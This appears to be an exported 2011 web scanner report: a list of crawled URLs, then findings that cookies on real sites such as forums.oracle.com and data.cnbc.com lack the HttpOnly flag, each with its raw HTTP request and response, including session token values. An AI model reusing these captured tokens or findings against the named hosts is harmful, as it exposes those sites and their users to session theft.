http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862
http://p.brilig.com/contact/bct
http://pi.pardot.com/analytics
http://ping.crowdscience.com/ping.js
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.quantserve.com/pixel
http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif
http://r.openx.net/img
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://register.cnbc.com/forgotPassword.do
http://register.cnbc.com/forgotpassword1.jsp
https://register.cnbc.com/
https://register.cnbc.com/RandomImage.jsp
https://register.cnbc.com/cas
https://register.cnbc.com/checkemail.do
https://register.cnbc.com/checkpassword.do
https://register.cnbc.com/checkscreenname.do
https://register.cnbc.com/checkzipcode.do
https://register.cnbc.com/createUser.do
https://register.cnbc.com/css/forgotPassword.css
https://register.cnbc.com/css/member_center_sytles.css
https://register.cnbc.com/css/newRegistration.css
https://register.cnbc.com/css/registration.css
https://register.cnbc.com/email/EmailSupport.jsp
https://register.cnbc.com/favicon.ico
https://register.cnbc.com/forgotPassword1.do
https://register.cnbc.com/forgotpassword1.jsp
https://register.cnbc.com/images/clickToContinue.gif
https://register.cnbc.com/images/loaderImage.gif
https://register.cnbc.com/images/memberCenterHeader.jpg
https://register.cnbc.com/images/submitPreferences.jpg
https://register.cnbc.com/images/tick.jpg
https://register.cnbc.com/images/tile_02.gif
https://register.cnbc.com/images/wrong.jpg
https://register.cnbc.com/js/membercenter.js
https://register.cnbc.com/js/prototype_ajax.js
https://register.cnbc.com/js/registrationBasic.js
https://register.cnbc.com/js/registrationUtils.js
https://register.cnbc.com/js/registrationValidations.js
https://register.cnbc.com/js/s_code.js
https://register.cnbc.com/js/validation.js
https://register.cnbc.com/quote-html-webservice/fvquote.htm
https://register.cnbc.com/quote-html-webservice/quote.htm
https://register.cnbc.com/refreshlogin.jsp
http://rt.legolas-media.com/lgrt
http://search.spotxchange.com/track/tag/6382.1008/img
http://server.iad.liveperson.net/hc/52793056/
http://services.krxd.net/geoip
http://services.krxd.net/pixel.gif
http://sophelle.app5.hubspot.com/salog.js.aspx
http://statse.webtrendslive.com/dcscnww13100008eg8v7k3x39_3j3x/dcs.gif
http://t2.trackalyzer.com/trackalyze.asp
http://t5.trackalyzer.com/trackalyze.asp
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
http://tags.bluekai.com/site/3834
http://tenzing.fmpub.net/
http://ticker.cnbc.com/
http://www.actonsoftware.com/acton/bn/1227/visitor.gif
http://www.bizographics.com/collect/
http://www.cnbc.com/
http://www.cnbc.com/id/15837856
http://www.cnbc.com/id/15837856/site/14081545/
http://www.cnbc.com/id/15838394
http://www.cnbc.com/id/15839263/
http://www.cnbc.com/pointrollads.htm
http://www.csc.com/cybersecurity/contact_us
http://www.csc.com/search
http://www.csc.com/services
http://www.csc.com/utils/live_search
http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp
http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp
http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp
http://www.gillettevenus.com/en_US/razor_finder/index.jsp
http://www.gillettevenus.com/en_US/search/index.jsp
http://www.googleadservices.com/pagead/aclk
http://www.marykay.com/
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg
http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js
http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf
http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf
http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf
http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf
http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf
http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf
http://www.marykay.com/Content/HPflash/502_moc.swf
http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf
http://www.marykay.com/IMAGES/bkgLong.gif
http://www.marykay.com/Images/Checkout/viewbag/btn_x.png
http://www.marykay.com/Images/Site/FooterBack1.gif
http://www.marykay.com/Images/Site/hdottedline.gif
http://www.marykay.com/Images/Site/searchbox.gif
http://www.marykay.com/Images/Site/vdottedline.gif
http://www.marykay.com/Images/Site/wholeheader.jpg
http://www.marykay.com/JS/swfobject.js
http://www.marykay.com/Menu.css
http://www.marykay.com/Scripts/HeaderScript.js
http://www.marykay.com/Scripts/jquery-1.4.2.min.js
http://www.marykay.com/Styles.css
http://www.marykay.com/Styles_US.css
http://www.marykay.com/Themes/TabMenu/US/tabs.css
http://www.marykay.com/Themes/TabMenu/tabs.js
http://www.marykay.com/content/HPflash/portfolio_mk.xml
http://www.marykay.com/content/hpflash/stage.swf
http://www.marykay.com/default.aspx
http://www.marykay.com/favicon.ico
http://www.marykay.com/images/fflogo.jpg
http://www.marykay.com/images/icn_ec.jpg
http://www.marykay.com/images/icn_fb.jpg
http://www.marykay.com/images/icn_pbp.jpg
http://www.marykay.com/images/icn_vmo.jpg
http://www.marykay.com/images/icn_yt.jpg
http://www.marykay.com/images/ielogo.jpg
http://www.marykay.com/images/searchbutton.gif
http://www.marykay.com/scripts/i2a.js
http://www.sapient.com/en-us/about-sapient/alliances.html
http://www.sapient.com/en-us/about-sapient/alliances/atg.html
http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html
http://www.sapient.com/en-us/search.html
http://www.tenzing.com/atg-ecommerce-hosting.asp
http://www2.znode.com/analytics
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
13.1. http://afe.specificclick.net/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://afe.specificclick.net
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=fb406049426234e5945296c2a152; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: afe.specificclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: WebStar 1.0 Expires: Thu, 01 Dec 1994 16:00:00 GMT Pragma: no-cache Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0 X-Powered-By: JSP/2.1Set-Cookie: JSESSIONID=fb406049426234e5945296c2a152; Path=/ Content-Type: text/plain;charset=ISO-8859-1 Date: Tue, 06 Sep 2011 17:05:55 GMT Connection: close Vary: Accept-Encoding
13.2. http://afe.specificclick.net/serve/v=5
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://afe.specificclick.net
Path:
/serve/v=5
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=f45f2c4eedfe5c52c57643e800e5; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906110541 HTTP/1.1 Host: afe.specificclick.net Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ADVIVA=NOTRACK; JSESSIONID=f45f22ce332bb32f495908027d55
Response
HTTP/1.1 200 OK Server: WebStar 1.0 Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0 Pragma: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMTSet-Cookie: JSESSIONID=f45f2c4eedfe5c52c57643e800e5; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Tue, 06 Sep 2011 15:05:40 GMT Vary: Accept-Encoding Content-Length: 1708 Connection: Keep-Alive <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0...[SNIP]...
13.3. http://blog.harbottle.com/dm/xmlrpc.php
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://blog.harbottle.com
Path:
/dm/xmlrpc.php
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:PHPSESSID=e97d8a82d9152534016674330abb1139; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dm/xmlrpc.php HTTP/1.1 Host: blog.harbottle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:16 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9Set-Cookie: PHPSESSID=e97d8a82d9152534016674330abb1139; path=/ Content-Length: 42 Connection: close Content-Type: text/html XML-RPC server accepts POST requests only.
13.4. http://convctr.overture.com/images/cc/cc.gif
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://convctr.overture.com
Path:
/images/cc/cc.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZupuYmAI4hjA4O; domain=.overture.com; path=/; expires=Tue, 06-Sep-2011 16:51:44 GMT The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/cc/cc.gif?ver=1.0&aID=9684550200&mkt=0&ref=http%3A//www.rayalab.com/%3Fgclid%3DCMuoq_OIiasCFRligwodfwxd4w HTTP/1.1 Host: convctr.overture.com Proxy-Connection: keep-alive Referer: http://www.rayalab.com/free_sample.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxMLAycAc8BMqgw=
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:46:44 GMT Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29Set-Cookie: SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZupuYmAI4hjA4O; domain=.overture.com; path=/; expires=Tue, 06-Sep-2011 16:51:44 GMT P3P: CP=" NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR STP IND UNI COM NAV INT STA " Pragma: no-cache Connection: close Content-Type: image/gif Content-Length: 34 GIF89a.............,...........L.;
13.5. http://data.cnbc.com/quotes
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://data.cnbc.com
Path:
/quotes
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=1D2F47641A6DD26BE61912AD60DD5D15; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quotes HTTP/1.1 Host: data.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:04:05 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19Set-Cookie: JSESSIONID=1D2F47641A6DD26BE61912AD60DD5D15; Path=/ Content-Language: en Content-Type: text/html;charset=UTF-8 Via: 1.1 aicache6 Content-Length: 128064 X-Aicache-OS: 64.210.194.246:80 Connection: Keep-Alive Keep-Alive: max=20 <html:html locale="true"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="refresh" content="300" /> <link rel="shor...[SNIP]...
13.6. https://forums.oracle.com/forums/adfAuthentication
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/adfAuthentication
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/adfAuthentication?success_url=/main.jspa?categoryID=84 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; BIGipServerforums_prod_pool=51417741.20480.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84
Response
HTTP/1.1 302 Moved Temporarily Server: Oracle-Application-Server-10g Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~5D09C635ADF7FCDB0B22A013B7D8A7E733E380B6F6B6FECC2930922D66B8A284C6CAC96F2D43EDA75D75999112956B40FF55201353C5FF03211190E58DE009348F6D3456BA825C6590982D6D5B75724AC9C814653CA5B4274DF09863BB77CA0770B13679F52272A0D1E2FE7CA3525FF488B1976FEF2DF74B823F474CB693675BC66F11D8776FC908E5FFD08D5EEEC4F5C523677FFE230719283092BCC55C29D4C61D4D7016E82800B744931F8E3DF98D4ED662639D486F749A20DED6E2B1D87CCF2068965103F4675905FB43A8DED28469B093EC4D09E6686DE6852A4B2608F1844974BE4B33DFF805A1E7EEB276CEA7 Osso-Paranoid: false Content-Type: text/html Content-Length: 0 Date: Tue, 06 Sep 2011 16:14:09 GMT Connection: keep-alive Vary: Accept-EncodingSet-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums
13.7. https://forums.oracle.com/forums/category.jspa
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/category.jspa
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums BIGipServerforums_prod_pool=202412685.20480.0000; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/category.jspa?categoryID=18 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Content-Language: en-US Content-Type: text/html; charset=UTF-8 Content-Length: 123998 Date: Tue, 06 Sep 2011 16:13:12 GMT Connection: keep-alive Vary: Accept-EncodingSet-Cookie: JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums Set-Cookie: BIGipServerforums_prod_pool=202412685.20480.0000; path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>OTN Discussion Forums : Database</title> <meta http-equiv="content-type" content="te...[SNIP]...
13.8. https://forums.oracle.com/forums/guestsettings!default.jspa
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/guestsettings!default.jspa
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d92100c30d7caf68638f82744638e708dcb2aab2d2d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/guestsettings!default.jspa HTTP/1.1 Host: forums.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Content-Language: en Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 17:07:32 GMT Connection: close Connection: Transfer-EncodingSet-Cookie: JSESSIONID=8d92100c30d7caf68638f82744638e708dcb2aab2d2d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums Content-Length: 36286 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>OTN Discussion Forums : Forum Settings</title> <meta http-equiv="content-type" conte...[SNIP]...
13.9. https://forums.oracle.com/forums/index.jspa
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/index.jspa
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/index.jspa?cat=1 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 302 Moved Temporarily Server: Oracle-Application-Server-10g Content-Language: en-US Location: https://forums.oracle.com/forums/main.jspa?categoryID=84 Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 16:13:25 GMT Connection: keep-alive Vary: Accept-Encoding Connection: Transfer-EncodingSet-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums Content-Length: 246 <HTML><HEAD><TITLE>Redirect to http://forums.oracle.com/forums/main.jspa?categoryID=84</TITLE></HEAD><BODY><A HREF="http://forums.oracle.com/forums/main.jspa?categoryID=84">http://forums.oracle.com/fo...[SNIP]...
13.10. https://forums.oracle.com/forums/login!withRedirect.jspa
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/login!withRedirect.jspa
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/login!withRedirect.jspa HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; BIGipServerforums_prod_pool=51417741.20480.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84
Response
HTTP/1.1 302 Moved Temporarily Server: Oracle-Application-Server-10g Content-Language: en-US Location: https://forums.oracle.com/forums/adfAuthentication?success_url=/main.jspa?categoryID=84 Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 16:14:08 GMT Connection: keep-alive Vary: Accept-Encoding Connection: Transfer-EncodingSet-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums Content-Length: 339 <HTML><HEAD><TITLE>Redirect to http://forums.oracle.com/forums/adfAuthentication?success_url=/main.jspa?categoryID=84</TITLE></HEAD><BODY><A HREF="http://forums.oracle.com/forums/adfAuthentication?suc...[SNIP]...
13.11. https://forums.oracle.com/forums/main.jspa
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/main.jspa
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343589432; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=51417741.20480.0000
Response
